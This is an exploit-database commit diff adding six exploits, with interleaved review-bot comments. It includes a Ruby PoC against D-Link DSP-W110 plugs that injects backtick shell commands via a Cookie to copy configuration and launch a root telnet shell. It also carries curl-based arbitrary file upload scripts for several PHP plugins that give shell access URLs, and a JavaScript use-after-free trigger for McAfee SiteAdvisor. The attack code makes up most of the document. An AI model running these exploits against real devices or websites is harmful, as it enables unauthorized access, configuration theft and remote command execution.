DB: 2015-07-02
6 new exploits
parent
7e7d4b0244
commit
2dc4d37f0f
7 changed files with 490 additions and 0 deletions
|
@ -33793,3 +33793,9 @@ id,file,description,date,author,platform,type,port
|
|||
37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF Vulnerability",2015-06-30,"Wissam Bashour",asp,webapps,0
|
||||
37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,metasploit,multiple,remote,0
|
||||
37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0
|
||||
37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
|
||||
37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor 'upload.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
|
||||
37452,platforms/php/webapps/37452.txt,"WordPress Flip Book 'php.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
|
||||
37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
|
||||
37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
|
||||
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
|
||||
|
|
|
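--- a/platforms/hardware/webapps/37454.txt
+++ b/platforms/hardware/webapps/37454.txt
@@ -0,0 +1,168 @@
+# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
+# Date: 30/06/2015
+# Exploit Author: DNO
+# Vendor Homepage: [link]
+# Version: w110 v1.05b01
+# Tested on: linux
+# CVE : N/A
+
+========================================
+
+the only 'filtering' on this resources appears to be a sprintf()
+call which statically prefixes a submitted 'dev' argument with '/www'.
+However,
+if a HTTP request is performed without a 'dev' argument at all, the
+sprintf() call is never reached,
+and a fully-qualified path can be provided in the 'path' parameter -
+bypassing the upload path restriction.
+
+***************
+# Upload arbitrary files to the device.
+echo 'Some String' > test.txt
+curl \
+-X POST \
+-i \
+-F name=@test.txt \
+--http1.0 \
+'192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
+
+========================================
+
+# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
+# Date: 30/06/2015
+# Exploit Author: DNO
+# Version: w110 v1.05b01
+# Tested on: linux
+# CVE : N/A
+
+========================================
+Severity Level:
+===============
+High
+===============
+Patches made to lighttpd by the vendor of this device allows an attacker to
+query the device, without authentication, for the following information:
+
+# Current WLAN SSIDs
+# Current WLAN channels
+# LAN and WAN MAC addressing
+# Current firmware version information
+# Hardware version information
+
+Although not sensitive information, it may allow for identification of
+devices running vulnerable firmware versions.
+
+=========================================
+# Information query.
+curl \
+192.168.1.3/mplist.txt
+
+========================================
+#ruby poc
+----
+
+# DSP-W110-Lighttpd PoC.
+
+require 'pp'
+require 'optparse'
+require 'restclient'
+
+# Set defaults and parse command line arguments
+options = {}
+
+options[:addr] = "192.168.0.60"
+options[:port] = 80
+
+OptionParser.new do |option|
+
+option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
+options[:addr] = a
+end
+
+option.on("--port [PORT]", "Destination TCP port") do |p|
+options[:port] = p
+end
+
+option.parse!
+
+end
+
+# Define which actions we will be using.
+actions = [
+{
+:name => "Get device information",
+:call => "txt_parser",
+:path => "mplist.txt",
+},
+{
+:name => "Snatch configuration",
+:call => "noop",
+:path => "HNAP1",
+:cookies => { :cookie => "`cp /etc/co* /www/`" }
+},
+{
+:name => "Fetch configuration",
+:call => "conf_writer",
+:path => "config.sqlite",
+},
+{
+:name => "Enable telnet (root)",
+:call => "noop",
+:path => "HNAP1",
+:cookies => { :cookie => "`telnetd -l/bin/sh`" }
+}
+]
+
+def noop(val)
+return
+end
+
+def txt_parser(txt)
+txt.split(/\r?\n/).each do |line|
+puts " #{line}"
+end
+end
+
+def conf_writer(txt)
+begin
+f = File.open('./config.sqlite', 'wb')
+rescue => e
+puts "[!] Failed to open config.sqlite for writing #{e.message}"
+end
+f.write(txt)
+f.close
+puts "[*] Configuration fetched into 'config.sqlite'"
+end
+
+# Iterate over all actions and attempt to execute.
+url = "http://#{options[:addr]}:#{options[:port]}"
+
+puts "[!] Attempting to extract information from #{url}"
+
+actions.each do |action|
+
+# Fire the request and ensure a 200 OKAY.
+begin
+response = RestClient.get(
+"#{url}/#{action[:path]}",
+{:cookies => action[:cookies]}
+)
+rescue
+puts "[!] Failed to query remote host."
+abort
+end
+
+if response.code != 200
+puts "[-] '#{action[:name]}' failed with response: #{response.code}"
+next
+end
+
+# Send to the processor.
+puts "[*] #{action[:name]} request succeeded."
+send(action[:call], response.body())
+
+end
+===================================
+
+contact me FB : FB.COM/haker.dyno
+Copyright © 2015 /DNO/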
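Review bot: The two `HNAP1` entries in the `actions` table send a backtick-wrapped shell command as the `Cookie` value, yet neither advisory block above the script documents that behaviour; the prose covers only the `path` upload bypass and `mplist.txt`. It also calls the exposure "not sensitive information" while the script goes on to copy and fetch `config.sqlite` and start `telnetd`, so the stated impact and the code disagree. I would add a comment above `actions` such as `# HNAP1: the Cookie value appears to reach a shell without authentication (not covered in the text above)`, hedged because the device-side handler is not shown in this file. For defenders, the indicators visible here are backticks in a Cookie header on requests to `/HNAP1`, a `config.sqlite` served from the web root, and an unexpected telnet listener on the device.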
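--- a/platforms/php/webapps/37450.txt
+++ b/platforms/php/webapps/37450.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54170/info
+
+Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
+# Version : 1.01
+# Link : http://code.google.com/p/uploadify-amazon-s3/
+# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
+# Date : 21-06-2012
+# Google Dork : inurl:/files/uploadify/ -google
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+<?php
+
+$uploadfile="lo.php";
+
+$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/files/uploadify/lo.php
+
+lo.php
+<?php
+phpinfo();
+?>
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database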
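Review bot: The advisory text stops at "fails to adequately sanitize user-supplied input" and gives no root cause or remediation, although the request in the `<?php` block shows both: `uploadify.php` accepts a `.php` file in `Filedata`, takes the destination from the `folder` query parameter, and the stored file is then served from `/files/uploadify/`. A line such as `# Fix: allow-list extensions server-side, ignore the client-supplied folder, store uploads outside the web root or disable PHP execution there` would make the entry usable for remediation. The same gap applies to the sections for 37451.txt and 37452.txt, whose handlers (`upload.php`, `php.php`) are described in identical wording. No authentication step appears in any of the three requests, which suggests the handlers are reachable anonymously; that is inferred from the scripts, not stated in the text.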
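--- a/platforms/php/webapps/37451.txt
+++ b/platforms/php/webapps/37451.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54172/info
+
+Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
+# Version : 1.0.4
+# Link : http://www.silverstripe.org/pixlr-image-editor-module/
+# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
+# Date : 21-06-2012
+# Google Dork : not discover
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+<?php
+
+$uploadfile="lo.php";
+
+$ch = curl_init("http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/upload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
+
+lo.php
+<?php
+phpinfo();
+?>
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database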
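--- a/platforms/php/webapps/37452.txt
+++ b/platforms/php/webapps/37452.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54173/info
+
+Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Flip Book 1.0 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
+# Version : 1.0
+# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
+# Price : 30$
+# Date : 22-06-2012
+# Google Dork : inurl:/wp-content/plugins/flipbook/
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+<?php
+
+$uploadfile="lo.php";
+
+$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/flipbook/php.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
+
+lo.php
+<?php
+phpinfo();
+?>
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database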
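--- a/platforms/php/webapps/37453.php
+++ b/platforms/php/webapps/37453.php
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/54179/info
+
+Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
+
+<?php
+
+$uploadfile="db.php.gif";
+$uploadfile2="lo.php.gif";
+
+$ch = curl_init("http://www.example.com/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
+'user_file[1]'=>"@$uploadfile2"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>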
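Review bot: The double extension in `$uploadfile="db.php.gif";` and `$uploadfile2="lo.php.gif";` is the only hint at the root cause, and nothing in the advisory text explains it. Presumably the module checks only the final extension while the web server still maps the `.php` inside the name to the PHP handler; that is an inference, since `upload.php` itself is not shown. I would add a comment saying so, e.g. `// relies on a last-extension-only check; server-side renaming or disabling script handlers in the upload directory closes it`. Note also that the file is stored as `37453.php` but opens with plain advisory prose before `<?php`, so that prose is emitted as output if the file is ever run.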
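--- a/platforms/windows/dos/37456.html
+++ b/platforms/windows/dos/37456.html
@@ -0,0 +1,100 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<meta http-equiv="content-type" content="text/html; charset=windows-1250">
+<meta name="generator" content="PSPad editor, www.pspad.com">
+<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
+</head>
+<body>
+<script>
+
+/*
+Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
+Author: Marcin Ressel
+Twitter: https://twitter.com/m_ressel
+NPMcFFPlg32.dll
+McAfee SiteAdvisor 3.7.2
+Tested on: Windows 8.1 (x64) and firefox 38.0.5
+Homepage: https://www.siteadvisor.com/
+
+Note: this vlun potentiali give us posibility to bruteforce base modules in memory
+to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
+i mean firefox will not crash after trigger uaf i McAfee
+
+0:107> !gflag
+Current NtGlobalFlag contents: 0x02001800
+htg - Enable heap tagging
+ust - Create user mode stack trace database
+hpa - Place heap allocations at ends of pages
+
+0:107> g
+(1d68.1b54): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
+eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
+NPMcFFPlg32!CreateFFScriptable+0x141:
+6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
+
+...
+6f40437a 8b02 mov eax,dword ptr [edx]
+6f40437c 85c0 test eax,eax
+6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
+6f404380 8b00 mov eax,dword ptr [eax]
+6f404382 8b4808 mov ecx,dword ptr [eax+8]
+6f404385 8b4004 mov eax,dword ptr [eax+4]
+6f404388 49 dec ecx
+6f404389 234a08 and ecx,dword ptr [edx+8]
+6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
+6f40438f 8b00 mov eax,dword ptr [eax]
+6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
+6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
+6f404396 8d45d0 lea eax,[ebp-30h]
+6f404399 50 push eax
+6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
+6f40439f 8bd0 mov edx,eax
+6f4043a1 8b02 mov eax,dword ptr [edx]
+6f4043a3 85c0 test eax,eax
+6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
+6f4043a7 8b00 mov eax,dword ptr [eax]
+6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
+6f4043ac 8b4004 mov eax,dword ptr [eax+4]
+6f4043af 49 dec ecx
+6f4043b0 234a08 and ecx,dword ptr [edx+8]
+6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
+6f4043b6 8d45c4 lea eax,[ebp-3Ch]
+6f4043b9 50 push eax
+6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
+6f4043bf 8bd0 mov edx,eax
+...
+
+*/
+
+var win = null;
+
+function crash()
+{
+var doc = win.document;
+
+var obj = doc;
+win.close();
+
+for(var p in obj)
+{
+if(typeof obj[p] == 'string')
+{
+try{ obj[p] = "CCCC"; }catch(err){}
+}
+}
+}
+
+win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
+win.onload = crash;
+
+
+
+</script>
+
+</body>
+</html>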
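Review bot: The `Note:` lines in the script comment claim a possible ASLR/DEP bypass, but the debugger output below them shows only a read access violation at `NPMcFFPlg32!CreateFFScriptable+0x141` (`mov eax,dword ptr [eax+8]`), captured with page heap (`hpa`) enabled. For triage that distinction matters: without page heap the stale read may not fault at all, which fits the author's remark that Firefox does not crash, and nothing shown demonstrates control beyond the read. I would reword the note to something like `Note: evidence below is a read AV on freed memory under page heap; impact beyond that is unverified`. The entry is filed under `dos`, which matches the evidence actually shown.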